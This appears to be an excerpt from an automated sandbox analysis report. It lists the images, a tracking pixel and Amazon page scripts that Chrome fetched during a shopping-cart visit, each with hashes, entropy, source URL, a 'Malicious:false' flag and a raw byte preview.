                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1A."Qa.#Uqr....2R......Bs......................................................!13.4Q."A....$2Ra..............?....q..DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@\^..\....I=......IQ.40..J....<...O.....#p|E6.?..L~....x.vE...{..7h#{...}..;...+..N|Il....;n~...s.QV....ku...3.[..O..Y. ..~l.foc..".r..#ai:p...vO.....q.|/|gA.qix.".F;.a....?.J...*^.e.1..32u..0e....]D.Q._..P.x...k..3<...#ZNW....Io.X)..O...1.2.Yl*x..m|$f@........D_.. ....0.;....*/.q....=8.'xc.nG...n.6..Y.WOTh.el..y.......)..6.).C......kv6.`...t.5.>..l.K.J....b" ""." ""." ""." (..UR..i...d...c...=.?s....s./.L.o.h.qJ...5}Ob....f.5d.k.)..x..63..wn..}.^...M.....dO.{M....~..^#...c.8}[,5^.9....;.p....}.C....s..e..G.k......e.....6.X.....b.m.*_..O..EL.U.....lH2.....-.Z..S.0.]...f....1........T..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (622)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):517311
                                                                                                                                                                                                        Entropy (8bit):5.482843222459866
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:B1dVsglmT3oyFVzBybpFxzQPOkzblCAx1CDz1TJymdWAkuc03Fp0c/DrniaOdKS8:/naV8RkzblPOZzZZKjDXecIenxSX
                                                                                                                                                                                                        MD5:0B52E2A79C5274A08E381DA2836BF689
                                                                                                                                                                                                        SHA1:FDFB785C6A494361AD66A4A8E1352E63D243E117
                                                                                                                                                                                                        SHA-256:81E5B35E7A7874AE98114D321D8C968B0E1CC1D2D5CD6ECA5DE2E3A7046F1969
                                                                                                                                                                                                        SHA-512:FFE35A94C9AA71BF4B8C22E2FE14CE03EFC44A47F4AF7BC95FF7C1342965173BA81BA74F7EDFAC21F1BD9C89A0305A29ED502B019FF95451810A9793E24264E9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(b){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,a=d?d("TurboCheckoutBaseAssets@accessibility_switch",""):c;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,c,d){b.when("turbo-initiate-migration-switch").register("turbo-checkout-accessibility-switch",function(a){return{isEnabled:function(){return a.isEnabled()}}})});./* ******** */.(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("TurboCheckoutBaseAssets@buy_now_to_tango_switch",""):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){a.when("turbo-configuration","buy-now-to-tango-switch-mobile","buy-now-to-tango-switch-desktop","buy-now-to-tango-switch-beta").register("buy-now-to-tango-switch",function(b,a,c,d){return{isEnabled:function(){return b.get(b.KEYS.IS_BUY_NOW_TO_TANGO_ENABLED)&&(a.isGatingWeblabEnabled()||.c.isGatingWeblabEnabled()||d.isGatingWeblabEnabled())}}});"use st
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4260
                                                                                                                                                                                                        Entropy (8bit):7.742053010550002
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TA2RCiS71uzLqvbFdHWz3nL6k3FQmBUB3yGefE9tDhTiEn:c5BMfiFYzeMQHgZfEzwEn
                                                                                                                                                                                                        MD5:5FBA5B30EC249C1073EDACB1AA73AC42
                                                                                                                                                                                                        SHA1:EA3E568DA1498965FFDB0F2D4F409BDD7B8D3780
                                                                                                                                                                                                        SHA-256:A21D09441B72F734DE0406F551DC2C5CB44D75F458D2D7445662132D283C2A0C
                                                                                                                                                                                                        SHA-512:2DB26BCA167DB8D5839F14CED6BE34A8F0F9EBEF9CE7C57E2506675737A7ABAC4307C3FB348EF49CAB3D27AD9D3F77610722AE34EB451ECA2CCD463C3DE45A5B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................X.........................X.Q...&q.........$....;h5...}.......:7....W..._.d.z.|..7W.c.a..H............y...:.:I2:..q.=......)...!....q/c....}$...........}.^..LX.+..p.S..&.|.K\..,....1._E.....O.}..<!..;p.......L8>m..SI..y..$..w..;.g[!....T....)..5.z.0..:...r.Df..1...V...u...../@.......u.bE.2qr.5RSb..A/.[.]..W-...e,3.........8...#96..Zs80i..2...u....f.............a.#..~q...i.\6....;z...u[)..."]...r......fQ.5..-y*.U.4..$....l!Y...w0...:....sB..@.......@....@.............?...-.........................1.. "0.!2A.#@QBD`p.............."U.k<....)2U.Dq-o......w.N...%..eOl.)b.^.}.......LE..*8....QK..m...5I_.;l...,..i....H..........:..T.f..R9.G5H......K....\...s.t<v.....o'...d.M.FR.i..A.......[.O..._...lR..<..wU.~Q..Fr......ek
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13267
                                                                                                                                                                                                        Entropy (8bit):7.9657116388154705
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:3wQOVngEfghXgG3HxNFyEHZfKvnWfAe40i3Rhi95JkShlI740t1FTpT17rNYCnu:7hEY5/8EBf74lBh8Jaffl7pYL
                                                                                                                                                                                                        MD5:C18D89D0E7906D928C80B596BE25AB12
                                                                                                                                                                                                        SHA1:BDA907266C419394810EA3A19051BF9DD8ED5658
                                                                                                                                                                                                        SHA-256:7E455E22F41AEC2410C9E5F5A1CF3110DEC6C5859075834E8E4F492285A8C920
                                                                                                                                                                                                        SHA-512:1FF4C3310CA8237B98CC28DB88EF3E04174920EFA499B87411EB55975E63879774CA887F268E07641EB569259314BAD829A1AECF6DD9C41E9D8E081624491C14
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|..".............................................................!..."1..2A#QaqB...$R...Cbr....%3SDc....................................................!1.AQ."aq...2...b....#$R..............?.jK.OI.l].x...fuw(...Tl......~3v../......s.W[.H.^..m...._.F.....cZ-.M.;$3..#....rA..Y1t....u/|9..l.)i..;m<.3V..'o.e..[....m_.z5..c...B9o.......i.4..R".%...4.5r..p9F.....*FL..m..'h$T.....*2...S ..PeN...q....jV....8.-3%.rB.E..}=.......#?..u.....1O..[.`.......:.......v...._.U..c.0z..j...$.[.7$..y..c....i.m.Y....5.....t...|.P..b.<....80I....py...[...fc..U..2...=**UyD3.ZG.p/..u.G.........8&..T.6..../#.....?.u...........:...h...k...O.z..7.[.4...}...N.W.w.dE.Dr)PCG9`Cp...x..H.q.t.../.~)..w....I.{....J.#~A.9....T4=-).GJ....+..++..2..R.&ze.K.%..<@.y.5.(...4...YJ.......N.4}u5....b..U.B.db.xv...}.#..t..R..t..e...(.m
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 255x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10379
                                                                                                                                                                                                        Entropy (8bit):7.93619350611049
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:tt5J8r8Z/QNtwjYp1WUFxtUWaUp8/zwRKxMImWgcP2+7QFo59ecNumm9:ttAr2mtwSLtUWrpbRmMpGP2+x9Ml9
                                                                                                                                                                                                        MD5:ACD6DCD05168CDACBD67A3CB9CD590EE
                                                                                                                                                                                                        SHA1:01EFF5E52E3C10030FC2F8F0549076D4C157E110
                                                                                                                                                                                                        SHA-256:7959A6523B868AA405E0D5515429504235C878216492CDF6A039E6DD9E7E4243
                                                                                                                                                                                                        SHA-512:115B86390058FAFA260E4994DB76CB56B07A6CA8FE2902AA17C673C61A172BD4A40F3F294B168DFB895600D2F74B6B2F56C48EF5BD2F451C71C9F7A23D155218
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61tt9VVcfFL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........X...,b.i...Z......;.0.O..R........RU1..8.P....&&...i+.PtZ]...E.J..J..{...2.z...T[..;....'x.X..u*.-...z....-..1u[#....r."..1....;.........q.d..\i.x,I"+.3..o.<s.~..RR.....Z.0.]b'.1...<..c.v.<%h....\Bm9A...............o....IZUz.v...T.......U..o.....&$N?...>1..EDk..-......#.-..U.C+K.6K...r...=.g...j...m.. Q.6.if]o...../.[.~..5.I".........m....t.....zL9..N.........R{U..y..K....;i...}....t..p..Q:.f.....1....kkk.g.Y..x.-s.9|.hj.=6 ..H2...I...W^.:b.......I.....0g.W y..1..3<g6N../..\...........Z.1t.o5E..}{([.s.+)..j..[..5.v..:...%....-{F..!1...A.(..'....o.....+M.{5.^.T....O.Vcs.....H.?..cq..z....j...k..G.|v..c^{.......&.].2.F........,.u.].c..G[.Y....<.f,........#Q..E.Y...vy.y/h..kn.gZu.;...6r..-...,c...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1467054
                                                                                                                                                                                                        Entropy (8bit):5.960621784851465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:VDSWZhjZ3LSqo6aJ8jMRIFxLIJKUYZd6SPfS2dHy1D30YJmpoUM0f3jlllQRquMK:NBZhjpSl6aJjbnm3QlD
                                                                                                                                                                                                        MD5:0F816DCC640E8E61CD91D8FECD506239
                                                                                                                                                                                                        SHA1:80A38CE38F0ED430F527074B01A5987283E4C036
                                                                                                                                                                                                        SHA-256:E74F63C33D04C3C10ACEB422221B019D0B5FA9E8C798C576E9E9DF848C26205D
                                                                                                                                                                                                        SHA-512:6B78E6575C493A995B9D01CB9E727085144B349062FDF3A984B2063C05AFC0FA7B93F9F2B016F86817BD21697E236F47E4401A5F4DD8A24DED279ACC3B32D63E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/A1fXNtoo+RL.js?AUIClients/ACICAssets
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("ACICAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET ACICAssets - 1.0./////////////////////////.// BEGIN FILE js/acic.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x96, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3685
                                                                                                                                                                                                        Entropy (8bit):7.875977869000477
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6/2j6j4OAZeuctKAwNRkOeHoHqKU871rFYlWtmbFLq2N0JYaOOWlqpdKl7Ki:T4i4OyuoKYVVmbFLq2HVOE68ziOKhA
                                                                                                                                                                                                        MD5:73F185A422FA33A6FB6BF16E5A8610B2
                                                                                                                                                                                                        SHA1:17A15E963D663B913500956A4A7EBD132465C599
                                                                                                                                                                                                        SHA-256:69618C4CB4AC03814AF5E1EDB37E330B8D05B64F0FB582FA2BCD202CE161ADBB
                                                                                                                                                                                                        SHA-512:E4F1A0EEFBDF3A15B9B069D94FCE39C3416B46D95A9A714B8A0FDF79381637531E1F2A8DEBE0A92BA1D05B774DA4300C8BED278D15141948A2A2EE2FC9BD47EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......`...."...............................................................!1Q..2Aaq...BRr.."#Cb.......$3c..4DSs................................................!..1."23aq..AQ.#..4................?..D@...DD....D@...DD....D@...DD.Bq..O.k...y..m...w...w8f.8.......7...F~.Q..%.|q...v..G....d....B\.........?V|...a.uD...'....n.+..U....vUK......`..L]..D...v........G.7.9..w......./...i.C..i?O...5..I.g...f:..f....kW.....!2C..|N.......Hr.1..6..OF.=?...[.8...p*7.........tE....8.v..;z...F....c.gU.~.n...}.3......h.S...+......8\/.q.""...." ...""...." ...""...." .'.1...u.......$|.R._.....N.4n.o<...q.3. ...7i.@..B..Ur.]..P.5.3..$..hm....{......p|.,."..s.......P.Z..hMC..N..[..=.JV\\Y7.7y...}.~NR.*.......!.......n..gF7kg..|.....X..[3w?.4..^w.....Z.......M.K#.....9... .Q|............z'....DD....D@...DD....D@...F-MI.y.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D5114%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8327
                                                                                                                                                                                                        Entropy (8bit):7.737215838786652
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ePwcly0XixCa94KxYpCXcZ+7YH9icDVXfdCACtpP2dUClJ:r6XQB94K3D7YH9RDVlJIMdU0
                                                                                                                                                                                                        MD5:0ED4C8CAB7485BA7C52ADAB0109CD52F
                                                                                                                                                                                                        SHA1:BD0D412BE62B3F4890CC3A3F54CC6AA5505B4EC3
                                                                                                                                                                                                        SHA-256:3FB55228D8FA31E9D5B8416B2141206E8CB051BB2FC9EF6EE3A1EE5C13649635
                                                                                                                                                                                                        SHA-512:C39BFDDF64F3EBB16AF0BB13A23B15B1253C8E1578663A992C4873F4CE471BD785DF86E52F5161ED4C7D779018B341432B9679A03050DD3FF4E02E4A07B4C9B9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.........................................................................................................................................................................................................k..'.}9.............}.|......}~|.._. .....'....G.g.'............}.|w.b......g.W..a..........<......@.3...:A.I0....=.&..D...D...$.........G4.L...jsZt..4..,..W..._.....+.fY.0zd>X...$XV...."n...... s..../Uv..x.W]Sb...^6.p..`...5.5.6.}.._Ci2..-O...9..M.....u.t.q..*.o...G.4.....,G..."n...... s...AU.T._.Z.r...r ..Mf....!.u..Y.>...:]Y0...,.....v.%.78.ZG....I.dJ{.....|..M..p........@.`.....{.^K:......I..6.:w.eC....^...x....C.d._..38F.*.a...w..d...s.G........:<..."X..b.`..&........<..(.ri.........p..b.{.Fs..[.e..U1.M1.E,..|.^iB..].p...A.v.-.+.x...p..j......W............ g.<.m.*..Y..[.^...."5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13211
                                                                                                                                                                                                        Entropy (8bit):7.961535399607753
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:eO4ybEdtzOL6JjOGzS46ERnMFB3TIIB9q3QUZyGXJx:eUE+L6JlW4vRnMFV79eQ2BXJx
                                                                                                                                                                                                        MD5:BB033813881044D9E7C3D43D33B19787
                                                                                                                                                                                                        SHA1:3DE237799F3C9B9F15D4E9A689480C684244BB12
                                                                                                                                                                                                        SHA-256:3A7BEDA40DD2E154AC82C7BEFA8BC69FC1F9D8D219EC58AF3C2A72BF021372AC
                                                                                                                                                                                                        SHA-512:9083E9AE1AE7E1A347C7BC42025B51A5BB1D7566A235A4067E0147FDD76FD9B9DF69409AF86894B6C51EFA25A2D81F33D83375B5962E41C4B01D40E047A63C0E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81iJG2js5-S._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|.."..............................................................!..1"2A..q#a3BQ..b..RTr....$%s..C..................................................!.1A."Qaq.2...........#bBCR.............?.t._Q6.....t.~.S...FDR. LE..d.X./...?....&m ~..u6........=...n.MA..n..j\..8.sQ.$....B....R..m];}......Me.k8#..|...........6...+`...fo...........`..).vt..*....D`.g*....+:J..(i+..z.s2.#2.F.NAD.....*..$.....K\..3.......6>B...B..C...0L/.t.......]g.....C..0....M..8..`86..O.......9...\\|...?.x][..B..9..>....Esw1I..{.;........kCf...._Pu..Q/b2...!.....b.YUd.^K?..18[.$|.uk.B4mQ...T.==.2).1.g........X|.5...e....<.z...=.C.$.....7...v.T..!f......2..]Z....J..8..I.... ..........]..o.T.,..]W.RG=;2B.ek....a..0T.NN...h....."..K....(k.._b....E9.%.3......-.Dz.......~..E.I..n...[f..........S+...J.............F..4...A..G.....ss~O'Sz._.:.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3641
                                                                                                                                                                                                        Entropy (8bit):7.6351402058950395
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TUJt5nsTs4gzNtcaERPVf8iA/5UJwGUM4Jmn:ezzNPfZOJw1M4gn
                                                                                                                                                                                                        MD5:CA6B80C3DFB5BC6C8FB9DABFB29E1F79
                                                                                                                                                                                                        SHA1:1504F6F24651FB3A7DFFD6CFCDB38CB701B59A9A
                                                                                                                                                                                                        SHA-256:1BDEDBD7034A48FF87D629F2D8DE18A5E1F3A199237E8A70F59E05A3196B04B9
                                                                                                                                                                                                        SHA-512:D8524424E33EBAE0849586173B368D29ABC1E7AD3835E9F8EE6DEDCBA4AF1EDD3185CF778F07732BC5F848878FB7A326F7523651372EDA55A5C938E9EBEDD1B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31PZG2Tr2YL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................`........................................@'..............)^4B..t..,........o._..f...!yZn....{a.&...1.u.Wl..t-7....e|.~._8.......%..Hp..S*.Z....g...c.".k....,...R...5.....cY..R.....K.}....;...S........._...KN..kY..X.K...<h.zU~.t-&...$.zX..g.v.........#.H5.....g,.J.....-...?.<..:fx...t..|>`......W.|(.!.%......o..Kz]..r..<#I........%..>...........................................-.........................12.!0..".#@Bp $3AR...........er..9.dv.......w2l.9........9....M@...!..9t.|..;9./...JJ[.........,.m......m.Q9.qxZf.vt.6.Ng..s6.l..r.........H$.t.CIr.....,p+.M..ft6.......,Q.....SSSSSSH.hD..hh_5....].Mzt.8.Cv.odH.\0/....V..ur5q..A..o4..#%Z@w.6...|..r...X..L..P[.m.w.G......A.+...Z.E}..B..-..w.^....)....v.q.o...v..P...P.96..SP.L...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 153x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7697
                                                                                                                                                                                                        Entropy (8bit):7.955375260524974
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Cr+c0CoM6R+CB7wAvXo6DvuvyRXdlJAe7Guc2:5c0LB7Zg6DuvaNEoF
                                                                                                                                                                                                        MD5:CA8AC606DEAE0D767D994966AD141F9A
                                                                                                                                                                                                        SHA1:49C9B1125CE0DE33594640F497C4FD4FA958F26E
                                                                                                                                                                                                        SHA-256:787B020E06A851BAAAAF9DE375C587D5CB62D556C0D3214A95F0DF96B6B573A0
                                                                                                                                                                                                        SHA-512:65A683CADA7C6E7DED64D4A9C1496A5BA57E65D81D3EFAA64989396B9C9EA894482000564DB143335B029BF2AA9DAF3E563304EA0B4FF63BD3D8EFBAE4D889F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71H5TbZ9G6L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1..A."Qq#2a....R.....BSb...$3Tr......45Cs...................................................!.1"Aa...2Q..q......#B.............?..t.(.+D....k.n....y..h.G..>..2..kR...$.4..z.h.W.W.....:..|{.l~\?7 ...T.:.V.{..n.`. ..Q..X...=..RhN.Qo5.>....w._...H.n......V..$.3~..j.......P.......W....y.(...<......'r.Zj.......Eg..n.U-....I...?.....!I....#"W...Q..FIl....../.U.Q.%.<6.|.{L.a...D..x...(Io..f<<...t...T-@.WGE.i7:.Z....n.p._...[~_z....l...uTU(.B.>%....s.f.]...tw.5..[..~I.........0,..9.8ea...qZ...Wo<2......7Egq....'..+.j..0./...Kk..{.......xP.a.Y{...~..N."I.......ea...b+......f...>M..kJ..p.5..^..?+P...Fm. 0...<.B6.......;..H.t...M....V.Z..t[Y.%.YR .HPK3.u..L.?['.../.:.....0.@.3...!.....V[......)v.m~.....P..%.67......?uf.%L.. #%X}m..;.Zg..3
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3406
                                                                                                                                                                                                        Entropy (8bit):7.84236182481663
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TMZhBvZ/MQT0YsGsoURd2HnWqq8jZ1PlJnUX:m7iQTbsGsoUR2xjjXPlJnU
                                                                                                                                                                                                        MD5:7EA10D8C04A0417291D8EB0BD283F23E
                                                                                                                                                                                                        SHA1:AC9EAB0ED8C5FB6C540BC39916F5AF30EB2DAF63
                                                                                                                                                                                                        SHA-256:65DC78804C05E7F1A23E9200359246FF4CFB73388F990465C2AB1411074F4F19
                                                                                                                                                                                                        SHA-512:BB4031DDCDBFD34CAE9E02C09DBB164E95E7AE6B38F173145549935B4C9DAE1954B8D1F6F8C40BA7E75DBF6E4C9CA56B300803D1DD7B03FFDE1620957F4F385E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Under1999_1x._SY116_CB659039472_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1..Q."Aa.....2BDTq.......#3CR...$bt.................................................1....!....BRSa."Qq.23A.$C...............?..............................N...&.yi...H.g....nAE..f|_.=gz.mL.7.p...qSEO.h....h.!.s...c.L....OQ.....=..W...zc.RK........G.G.=F.XUr.uc....c....,....zzB.|kG.z.|....9S...5%Gh\?.^......R{E........l.-7U.r....Hs...=.p..o..zI.>y....7......9M...9..{L.G.]....P.>p..a".|.O(....)..zaH...k....Eg....s..".."..).h..7.OL)?......:G..,s.|.....J.Tf..x....5_..&W.UH).tM7.}..y..d..&....r.....M.q..2ZX.f...b..h..._.G.W.A.........CO.)f..r..h.D[7.F|V.GO.r....E..t..u...Vc..2.....|..r....cw..q.m....\<)...E.8..A.?..i..K......nI....R.....;.W.....8.]>z.Z)Y.S.j..,-.L...=.._......XI.f."..nl.c.28#{dmM1s.Hs....p...a.6+.>..i...6W.#4.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9789
                                                                                                                                                                                                        Entropy (8bit):7.953808710159142
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:wDljIxh3ORIdorq7fJWdlSOwPG5eXfCo9gaByq:Iq3MshNOw+5IqoXByq
                                                                                                                                                                                                        MD5:BDDE092F3026FA49A620361713B3F38F
                                                                                                                                                                                                        SHA1:D058A1FBCCAFA4CE67C2CCE7B79E1FAAD1B1F382
                                                                                                                                                                                                        SHA-256:60077684429F6B9A2DD7FC9843FEF0F7F13A8E3C48A6C7E889419334C50EF5A3
                                                                                                                                                                                                        SHA-512:377BCF2AB7F00155530D702E219E114343B8A13721025075C36D1944160D339A2A5E693714AE36C897E68CAD6B22F690BCE4D03964C55BEFF9D20E92C5C580C6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
